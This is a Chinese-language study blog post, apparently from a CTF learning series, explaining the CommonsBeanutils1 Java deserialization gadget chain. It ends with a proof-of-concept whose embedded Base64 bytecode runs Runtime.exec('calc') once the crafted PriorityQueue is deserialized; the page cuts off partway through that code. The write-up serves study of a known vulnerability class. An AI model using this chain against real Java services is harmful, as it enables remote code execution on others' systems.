<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="HandheldFriendly" content="True" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=5"
    />
    <meta name="description" content="环境配置 可恶啊大家都没有写，只好自己找了，用的最新版 pom.xml没有下载是会说找不到，先maven install后再说 记得设置maven下载源码: 下载依赖的源码 IDEA的全局查找的是源码的，没有源码只有class时是找不到的，可以到External Libraries这里看是否已经下载了class文件    123456&lt;!-- https:&#x2F;&#x2F;mvnrepository.co">
<meta property="og:type" content="article">
<meta property="og:title" content="Java安全5(11)_CommonsBeanutils1">
<meta property="og:url" content="https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/index.html">
<meta property="og:site_name" content="KC1zs4&#39;s Blog">
<meta property="og:description" content="环境配置 可恶啊大家都没有写，只好自己找了，用的最新版 pom.xml没有下载是会说找不到，先maven install后再说 记得设置maven下载源码: 下载依赖的源码 IDEA的全局查找的是源码的，没有源码只有class时是找不到的，可以到External Libraries这里看是否已经下载了class文件    123456&lt;!-- https:&#x2F;&#x2F;mvnrepository.co">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-11-22T01:02:23.638Z">
<meta property="article:modified_time" content="2024-11-30T09:06:49.689Z">
<meta property="article:tag" content="Java安全">
<meta property="article:tag" content="java反序列化">
<meta name="twitter:card" content="summary">    
    <link
        rel="shortcut icon"
        href="/images/favicon.ico"
    />
       
    <link
        rel="icon"
        type="image/png"
        href="/images/favicon-192x192.png"
        sizes="192x192"
    />
       
    <link
        rel="apple-touch-icon"
        sizes="180x180"
        href="/images/apple-touch-icon.png"
    />
      
    <!-- title -->
    <title>Java安全5(11)_CommonsBeanutils1</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-Z6JGRC9FT2"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-Z6JGRC9FT2');
  </script>

 <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
     
    <!-- mathjax -->
    
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/11/22/Java%E5%AE%89%E5%85%A85(12)_jdk8u20/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/11/21/Java%E5%AE%89%E5%85%A85(10)_jdk7u21/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&text=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&is_video=false&description=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全5(11)_CommonsBeanutils1&body=Check out this article: https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&title=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&name=Java安全5(11)_CommonsBeanutils1&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kc1zs4.github.io/2024/11/22/Java%E5%AE%89%E5%85%A85(11)_CommonsBeanutils1/&t=Java安全5(11)_CommonsBeanutils1"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-number">1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#commons-beanutils"><span class="toc-number">2.</span> <span class="toc-text">commons-beanutils</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TemplatesImpl-getOutputProperties"><span class="toc-number">3.</span> <span class="toc-text">TemplatesImpl.getOutputProperties()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BeanComparator"><span class="toc-number">4.</span> <span class="toc-text">BeanComparator</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gadget-CC2-XX-CC3"><span class="toc-number">5.</span> <span class="toc-text">Gadget: CC2+XX+CC3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CommonsBeanutils1-poc"><span class="toc-number">6.</span> <span class="toc-text">CommonsBeanutils1 poc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Q-%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%8D%E5%B0%84%E8%AE%BE%E7%BD%AEnew-Object-paylaodObj-payloadObj2-%E4%B8%BA%E4%B8%8D%E5%90%8C%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%8D%E7%84%B6%E4%BC%9A%E8%A7%A6%E5%8F%91"><span class="toc-number">7.</span> <span class="toc-text">Q: 为什么反射设置new Object[] {paylaodObj, payloadObj2}为不同的顺序仍然会触发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Debug%E4%B9%8B%E6%B3%95%E5%A4%A7%E4%B9%9F"><span class="toc-number">8.</span> <span class="toc-text">Debug之法大也</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ref"><span class="toc-number">9.</span> <span class="toc-text">Ref</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Java安全5(11)_CommonsBeanutils1
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name"></span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-11-22T01:02:23.638Z" class="dt-published" itemprop="datePublished">2024-11-22</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a>, <a class="p-category" href="/tags/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">java反序列化</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><ol>
<li>可恶啊大家都没有写，只好自己找了，用的最新版<ol>
<li>pom.xml没有下载是会说找不到，先maven install后再说</li>
<li>记得设置maven下载源码: <a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41937438/article/details/102633266">下载依赖的源码</a></li>
<li>IDEA的全局查找的是源码的，没有源码只有class时是找不到的，可以到External Libraries这里看是否已经下载了class文件</li>
</ol>
</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-beanutils<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-beanutils<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.9.4<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="commons-beanutils"><a href="#commons-beanutils" class="headerlink" title="commons-beanutils"></a>commons-beanutils</h2><blockquote>
<p>commons-beanutils中诸如此类的辅助方法有很多，如调用setter、拷贝属性等</p>
</blockquote>
<ol>
<li>Apache Commons Beanutil 是 Apache Commons 工具集下的另一个项目，它提供了对普通Java类对象（也称为JavaBean）的一些操作方法</li>
<li><em><strong>什么是JavaBean from wiki百科</strong></em>: 一个数据结构的封装<ol>
<li>有一个public的无参数构造函数</li>
<li>属性可以透过get、set、is（可替代get，用在布尔型属性上）方法或遵循特定命名规则的其他方法访问。</li>
<li>可序列化。</li>
</ol>
</li>
<li>commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ，让使用者可以直接调用任<br>意JavaBean的getter方法: <code>PropertyUtils.getProperty(new Cat(), &quot;name&quot;);</code>会自动找到name属性的getter方法，也就是 getName，而且可以<strong>调用函数</strong></li>
<li><strong>支持递归</strong>: 可以通过 <code>PropertyUtils.getProperty(a, &quot;b.c&quot;);</code> 的方式进行递归获取。通过这个方法，使用者可以很方便地调用任意对象的getter，适用于在不确定JavaBean是哪个类对象时使用</li>
</ol>
<h2 id="TemplatesImpl-getOutputProperties"><a href="#TemplatesImpl-getOutputProperties" class="headerlink" title="TemplatesImpl.getOutputProperties()"></a>TemplatesImpl.getOutputProperties()</h2><ol>
<li><p>之前学TemplatesImpl时就有注意到这一个属性，注意到，其中调用了TempalatesImpl链子的入口，</p>
 <figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">synchronized</span> Properties <span class="title function_">getOutputProperties</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> newTransformer().getOutputProperties();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">catch</span> (TransformerConfigurationException e) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="BeanComparator"><a href="#BeanComparator" class="headerlink" title="BeanComparator"></a>BeanComparator</h2><ol>
<li><p>顺着思路，寻找一个调用<code>PropertyUtils.getProperty()</code>的方法</p>
</li>
<li><p>发现BeanCompareator中的compare()方法有进行调用，只要能在这里触发链子就好了！思路就见下面了</p>
 <figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="type">int</span> <span class="title function_">compare</span><span class="params">( <span class="keyword">final</span> T o1, <span class="keyword">final</span> T o2 )</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ( property == <span class="literal">null</span> ) &#123;</span><br><span class="line">        <span class="comment">// compare the actual objects</span></span><br><span class="line">        <span class="keyword">return</span> internalCompare( o1, o2 );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">final</span> <span class="type">Object</span> <span class="variable">value1</span> <span class="operator">=</span> PropertyUtils.getProperty( o1, property );</span><br><span class="line">        <span class="keyword">final</span> <span class="type">Object</span> <span class="variable">value2</span> <span class="operator">=</span> PropertyUtils.getProperty( o2, property );</span><br><span class="line">        <span class="keyword">return</span> internalCompare( value1, value2 );</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">catch</span> ( <span class="keyword">final</span> IllegalAccessException iae ) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>( <span class="string">&quot;IllegalAccessException: &quot;</span> + iae.toString() );</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">catch</span> ( <span class="keyword">final</span> InvocationTargetException ite ) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>( <span class="string">&quot;InvocationTargetException: &quot;</span> + ite.toString() );</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">catch</span> ( <span class="keyword">final</span> NoSuchMethodException nsme ) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>( <span class="string">&quot;NoSuchMethodException: &quot;</span> + nsme.toString() );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="Gadget-CC2-XX-CC3"><a href="#Gadget-CC2-XX-CC3" class="headerlink" title="Gadget: CC2+XX+CC3"></a>Gadget: CC2+XX+CC3</h2><blockquote>
<p>核心思想是延续了CC2的PriorityQueue中readObject调用的compare()<br>使用到了CC2比较思想的衍生，但是脱离了CC库，虽然仍然需要Apache Commons这个依赖的，使用的是Apache Commons Beanutils</p>
</blockquote>
<ol>
<li><p><strong>Gadget</strong></p>
 <figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">java.util.PriorityQueue#readObejct()</span><br><span class="line">    java.util.PriorityQueue#heapify()</span><br><span class="line">        java.util.PriorityQueue#siftDown()</span><br><span class="line">            java.util.PriorityQueue#siftDownUsingComparator()   <span class="comment">// 上面和CC2一样</span></span><br><span class="line">                BeanComparator#compare()    <span class="comment">// 调用比较器的compare</span></span><br><span class="line">                    PropertyUtils#getProperty()</span><br><span class="line">                        TemplatesImpl#getOutputProperties() <span class="comment">// 下面的就和CC3一样，中间这部分是CB中的，可以连接两条半链</span></span><br><span class="line">                            TemplatesImpl#newTransformer()</span><br><span class="line">                                TemplatesImpl#getTransletInstance()</span><br><span class="line">                                    TemplatesImpl#defineTransletClasses()</span><br><span class="line">                                        TransletClassLoader#defineClass()</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="CommonsBeanutils1-poc"><a href="#CommonsBeanutils1-poc" class="headerlink" title="CommonsBeanutils1 poc"></a>CommonsBeanutils1 poc</h2><ol>
<li>不顾细节，先直接构造一遍</li>
<li>条件<ol>
<li>直接传一个空的BeanComparator对象给PriorityQueue就好</li>
<li>payload重点在于放入PriorityQueue的内容</li>
</ol>
</li>
<li>最终poc<ol>
<li><em><strong>outputProperties注意开头的o要小写</strong></em></li>
</ol>
</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> CommonsBeanutils1;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.compiler.Template;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xerces.internal.impl.dv.util.Base64;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.BeanComparator;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.nio.channels.Pipe;</span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CB1_p</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">/* * * * * * 1. 构造Templates Payload * * * * * */</span></span><br><span class="line">            <span class="type">TemplatesImpl</span> <span class="variable">payloadObj</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">            <span class="type">TemplatesImpl</span> <span class="variable">payloadObj2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">            setFieldValue(payloadObj, <span class="string">&quot;_bytecodes&quot;</span>, <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;Base64.decode(</span><br><span class="line">                    <span class="string">&quot;yv66vgAAADMAJwoACAAXCgAYABkIABoKABgAGwcAHAoABQAdBwAeBwAfAQAGPGluaXQ+AQADKClW&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEADVN0YWNrTWFwVGFibGUHAB4HABwBAAl0cmFuc2Zv&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;cm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20v&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;c3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRs&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;ZXI7KVYBAApFeGNlcHRpb25zBwAgAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJu&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;YWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlz&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;SXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJp&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;YWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBABlUZW1wbGF0ZXNJbXBsUGF5bG9hZC5q&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;YXZhDAAJAAoHACEMACIAIwEABGNhbGMMACQAJQEAE2phdmEvbGFuZy9FeGNlcHRpb24MACYACgEA&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;FFRlbXBsYXRlc0ltcGxQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFs&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;L3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxh&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;bi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAK&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;Z2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9T&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;dHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAMA&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;AQAJAAoAAQALAAAAYAACAAIAAAAWKrcAAbgAAhIDtgAEV6cACEwrtgAGsQABAAQADQAQAAUAAgAM&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;AAAAGgAGAAAACgAEAAwADQAPABAADQARAA4AFQAQAA0AAAAQAAL/ABAAAQcADgABBwAPBAABABAA&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;EQACAAsAAAAZAAAAAwAAAAGxAAAAAQAMAAAABgABAAAAFgASAAAABAABABMAAQAQABQAAgALAAAA&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;GQAAAAQAAAABsQAAAAEADAAAAAYAAQAAABsAEgAAAAQAAQATAAEAFQAAAAIAFg==&quot;</span>)&#125;);</span><br><span class="line">            <span class="comment">// 直接Object[] &#123;payloadObj, payloadObj&#125;也是可以更加稳妥，不用这个payloadObj2</span></span><br><span class="line">            <span class="comment">// 这里_name只是为了设置看看H和A是否对顺序有什么影响</span></span><br><span class="line">            setFieldValue(payloadObj, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;HelloTemplatesImpl&quot;</span>);</span><br><span class="line">            setFieldValue(payloadObj2, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;Z is the first one&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            <span class="comment">/* * * * * * 2. 设置触发器 * * * * * */</span></span><br><span class="line">            <span class="type">BeanComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>();</span><br><span class="line">            <span class="type">PriorityQueue</span> <span class="variable">triggerObj</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>, comparator);</span><br><span class="line">            <span class="comment">// // 下面可以判断出PriorityQueue应该是一个最小堆，这里可以不用插入</span></span><br><span class="line">            <span class="comment">// triggerObj.add(2);</span></span><br><span class="line">            <span class="comment">// triggerObj.add(1);</span></span><br><span class="line"></span><br><span class="line">            <span class="comment">/* * * * * * 3. 反射设置恶意代码 * * * * * */</span></span><br><span class="line">            setFieldValue(triggerObj,<span class="string">&quot;queue&quot;</span>,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;payloadObj2, payloadObj&#125;);</span><br><span class="line">            setFieldValue(triggerObj, <span class="string">&quot;size&quot;</span>, <span class="number">2</span>);   <span class="comment">// 需要进行设置，构造函数中只是初始容量</span></span><br><span class="line">            setFieldValue(comparator, <span class="string">&quot;property&quot;</span>, <span class="string">&quot;outputProperties&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* * * * * * 4. 序列化与反序列化 * * * * * */</span></span><br><span class="line">            <span class="type">ByteArrayOutputStream</span> <span class="variable">barr</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">            <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(barr);</span><br><span class="line">            oos.writeObject(triggerObj);</span><br><span class="line">            oos.close();</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 本地测试触发</span></span><br><span class="line">            <span class="comment">// System.out.println(barr);</span></span><br><span class="line">            <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(barr.toByteArray()));</span><br><span class="line">            <span class="type">Object</span> <span 